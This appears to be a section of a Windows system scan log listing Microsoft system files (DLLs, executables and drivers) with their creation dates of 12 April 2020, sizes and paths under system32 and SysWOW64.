2020-04-12 05:49 - 2020-04-12 05:49 - 019813376 _____ (Microsoft Corporation) C:\Windows\system32\HologramWorld.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 018027008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 014818816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 009930552 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 008013824 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 007604584 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Protection.PlayReady.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 007017472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 006525424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Protection.PlayReady.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 004563200 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 004129416 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 003799552 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 003753472 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_nt.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 003742544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 003547648 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 002986808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2020-04-12 05:49 - 2020-04-12 05:49 - 002871608 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 002800128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32kfull.sys
2020-04-12 05:49 - 2020-04-12 05:49 - 002768440 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 002494744 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 002369576 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.AppAgent.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 002188600 _____ (Microsoft Corporation) C:\Windows\system32\AppVEntSubsystems64.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 002087168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001945600 _____ (Microsoft Corporation) C:\Windows\system32\dcomp.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001835008 _____ (Microsoft Corporation) C:\Windows\system32\enterprisecsps.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001757096 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2020-04-12 05:49 - 2020-04-12 05:49 - 001726264 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001659408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft.Uev.AppAgent.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001610240 _____ (Microsoft Corporation) C:\Windows\system32\HologramCompositor.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001587712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aadtb.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001545216 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 001512832 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 001495864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppVEntSubsystems32.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001477112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dcomp.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001397560 _____ (Microsoft Corporation) C:\Windows\system32\hvix64.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 001386296 _____ (Microsoft Corporation) C:\Windows\system32\AppVEntSubsystemController.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001368576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Wpc.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001368576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Input.Inking.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001300280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2020-04-12 05:49 - 2020-04-12 05:49 - 001264640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 001261808 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001257472 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001245184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBroker.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001243648 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001081856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.Vpn.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 001077264 _____ (Microsoft Corporation) C:\Windows\system32\hvax64.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 001055376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000993280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSWorkspace.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000980832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webservices.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000974336 _____ (Microsoft Corporation) C:\Windows\system32\uDWM.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000924672 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000923136 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Management.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000912896 _____ (Microsoft Corporation) C:\Windows\system32\rasmans.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000892416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MbaeApiPublic.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000865280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000865280 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000811320 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000785920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000759272 _____ (Microsoft Corporation) C:\Windows\system32\taskschd.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000747320 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000744960 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.Office2013CustomActions.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000729600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FlightSettings.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Mirage.Internal.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BTAGService.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000689152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CPFilters.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000673704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppXDeploymentClient.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000647680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Internal.Management.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000638480 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000632832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WpcWebFilter.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000628408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000618296 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000604984 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000555008 _____ (Microsoft Corporation) C:\Windows\system32\appwiz.cpl
2020-04-12 05:49 - 2020-04-12 05:49 - 000538160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SHCore.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000530432 _____ (Microsoft Corporation) C:\Windows\system32\sppcext.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000529408 _____ (Microsoft Corporation) C:\Windows\system32\nltest.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000515600 _____ (Microsoft Corporation) C:\Windows\system32\dcntel.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000514560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft.Uev.Office2013CustomActions.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000513576 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000507152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskschd.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000498688 _____ (Microsoft Corporation) C:\Windows\system32\ntshrui.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000497152 _____ (Microsoft Corporation) C:\Windows\system32\wuuhext.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000491008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sppcext.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000487784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000477496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2020-04-12 05:49 - 2020-04-12 05:49 - 000465208 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000456504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys
2020-04-12 05:49 - 2020-04-12 05:49 - 000456192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appwiz.cpl
2020-04-12 05:49 - 2020-04-12 05:49 - 000452096 _____ (Microsoft Corporation) C:\Windows\system32\rdpclip.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000415760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aepic.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000410112 _____ (Microsoft Corporation) C:\Windows\system32\rascustom.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000406480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Enumeration.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000401408 _____ (Microsoft Corporation) C:\Windows\system32\es.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000381440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntshrui.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000336384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\es.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000330240 _____ (Microsoft Corporation) C:\Windows\system32\omadmclient.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000324408 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32k.sys
2020-04-12 05:49 - 2020-04-12 05:49 - 000323584 _____ (Microsoft Corporation) C:\Windows\system32\sppcommdlg.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000321536 _____ (Microsoft Corporation) C:\Windows\system32\wbadmin.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000277864 _____ (Microsoft Corporation) C:\Windows\system32\LsaIso.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000259776 _____ (Microsoft Corporation) C:\Windows\system32\logoncli.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000251704 _____ (Microsoft Corporation) C:\Windows\system32\offlinesam.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000234496 _____ (Microsoft Corporation) C:\Windows\system32\iasrad.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000227840 _____ (Microsoft Corporation) C:\Windows\system32\IndexedDbLegacy.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000211256 _____ (Microsoft Corporation) C:\Windows\system32\tcbloader.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000203264 _____ (Microsoft Corporation) C:\Windows\system32\LanguageComponentsInstaller.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000197632 _____ (Microsoft Corporation) C:\Windows\system32\Win32CompatibilityAppraiserCSP.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000190048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\logoncli.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iasrad.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000185952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\deviceaccess.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000179200 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.XamlHost.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000178192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\partmgr.sys
2020-04-12 05:49 - 2020-04-12 05:49 - 000175616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IndexedDbLegacy.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000164368 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\updatepolicy.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000147696 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000142544 _____ (Microsoft Corporation) C:\Windows\system32\LicensingUI.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000140800 _____ (Microsoft Corporation) C:\Windows\system32\slc.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000136192 _____ (Microsoft Corporation) C:\Windows\system32\sppc.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000135168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.XamlHost.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000123952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KerbClientShared.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000122368 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\slc.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000115120 _____ (Microsoft Corporation) C:\Windows\system32\phoneactivate.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000105984 _____ (Microsoft Corporation) C:\Windows\system32\utcutil.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000102216 _____ (Microsoft Corporation) C:\Windows\system32\changepk.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000101888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sppc.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000093712 _____ (Microsoft Corporation) C:\Windows\system32\hvloader.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000090624 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000089536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32u.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000087040 _____ (Microsoft Corporation) C:\Windows\system32\iasacct.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000084280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hvservice.sys
2020-04-12 05:49 - 2020-04-12 05:49 - 000071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Custom.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000071480 _____ (Microsoft Corporation) C:\Windows\system32\win32appinventorycsp.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000070144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000066624 _____ (Microsoft Corporation) C:\Windows\system32\iumcrypt.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000066048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iasacct.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000051200 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000050544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CloudNotifications.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\iaspolcy.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000049152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tbauth.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.Office2010CustomActions.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000043008 _____ (Microsoft Corporation) C:\Windows\system32\UpgradeResultsUI.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000040448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iaspolcy.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft.Uev.Office2010CustomActions.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000036152 _____ (Microsoft Corporation) C:\Windows\system32\DeviceCensus.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000033080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hwpolicy.sys
2020-04-12 05:49 - 2020-04-12 05:49 - 000031744 _____ (Microsoft Corporation) C:\Windows\system32\wksprtPS.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000031744 _____ (Microsoft Corporation) C:\Windows\system32\ias.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cmintegrator.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000029184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBrokerCookies.exe
2020-04-12 05:49 - 2020-04-12 05:49 - 000023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ias.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\slcext.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000021520 _____ (Microsoft Corporation) C:\Windows\system32\kdhvcom.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000019968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\slcext.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wksprtPS.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000015872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Custom.ps.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000012800 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000010752 _____ (Microsoft Corporation) C:\Windows\system32\DMAlertListener.ProxyStub.dll
2020-04-12 05:49 - 2020-04-12 05:49 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DMAlertListener.ProxyStub.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 017790464 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 007849216 _____ (Microsoft Corporation) C:\Windows\system32\OneCoreUAPCommonProxyStub.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 006168064 _____ (Microsoft Corporation) C:\Windows\system32\twinui.pcshell.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 003977216 _____ (Microsoft Corporation) C:\Windows\system32\tellib.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 003728384 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 003708928 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 003586872 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 003109376 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 002143232 _____ (Microsoft Corporation) C:\Windows\system32\WpcDesktopMonSvc.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 002126144 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 002114560 _____ (Microsoft Corporation) C:\Windows\system32\Windows.CloudStore.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001960448 _____ (Microsoft Corporation) C:\Windows\system32\aadtb.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001942528 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001918976 _____ (Microsoft Corporation) C:\Windows\system32\wevtsvc.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001783296 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Input.Inking.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001762816 _____ (Microsoft Corporation) C:\Windows\system32\wwansvc.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001719808 _____ (Microsoft Corporation) C:\Windows\system32\Wpc.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001497600 _____ (Microsoft Corporation) C:\Windows\system32\TokenBroker.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001480192 _____ (Microsoft Corporation) C:\Windows\system32\usocoreworker.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 001427456 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.Vpn.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001413704 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001378528 _____ (Microsoft Corporation) C:\Windows\system32\webservices.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001263856 _____ (Microsoft Corporation) C:\Windows\system32\WpcMon.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 001180672 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Authentication.Web.Core.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001136128 _____ (Microsoft Corporation) C:\Windows\system32\MbaeApiPublic.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001127424 _____ (Microsoft Corporation) C:\Windows\system32\WpcRefreshTask.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001083904 _____ (Microsoft Corporation) C:\Windows\system32\MusUpdateHandlers.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001071616 _____ (Microsoft Corporation) C:\Windows\system32\BTAGService.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 001011200 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000915192 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentClient.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000893952 _____ (Microsoft Corporation) C:\Windows\system32\FlightSettings.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000879616 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Management.Service.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000874512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms2.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000840704 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_Language.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000735744 _____ (Microsoft Corporation) C:\Windows\system32\AudioEndpointBuilder.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000722072 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000684560 _____ (Microsoft Corporation) C:\Windows\system32\SHCore.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000654912 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000637240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000605184 _____ (Microsoft Corporation) C:\Windows\system32\MusNotification.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000589384 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000550400 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000524264 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Enumeration.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000516096 _____ (Microsoft Corporation) C:\Windows\system32\MusNotificationUx.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000469504 _____ (Microsoft Corporation) C:\Windows\system32\cloudAP.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000459688 _____ (Microsoft Corporation) C:\Windows\system32\MusNotifyIcon.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000441144 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000437560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pci.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000416016 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000374784 _____ (Microsoft Corporation) C:\Windows\system32\ncbservice.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000355328 _____ (Microsoft Corporation) C:\Windows\system32\WpcApi.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000297272 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sdbus.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000278016 _____ (Microsoft Corporation) C:\Windows\system32\WpcTok.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000265216 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000259072 _____ (Microsoft Corporation) C:\Windows\system32\VPNv2CSP.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000256000 _____ (Microsoft Corporation) C:\Windows\system32\UpdateDeploymentProvider.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000251392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\winnat.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000241152 _____ (Microsoft Corporation) C:\Windows\system32\policymanagerprecheck.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000231912 _____ (Microsoft Corporation) C:\Windows\system32\deviceaccess.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000200192 _____ (Microsoft Corporation) C:\Windows\system32\updatepolicy.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000193848 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dumpsd.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000169472 _____ (Microsoft Corporation) C:\Windows\system32\SpatialAudioLicenseSrv.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000152408 _____ (Microsoft Corporation) C:\Windows\system32\KerbClientShared.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000151352 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\scmbus.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000127064 _____ (Microsoft Corporation) C:\Windows\system32\win32u.dll
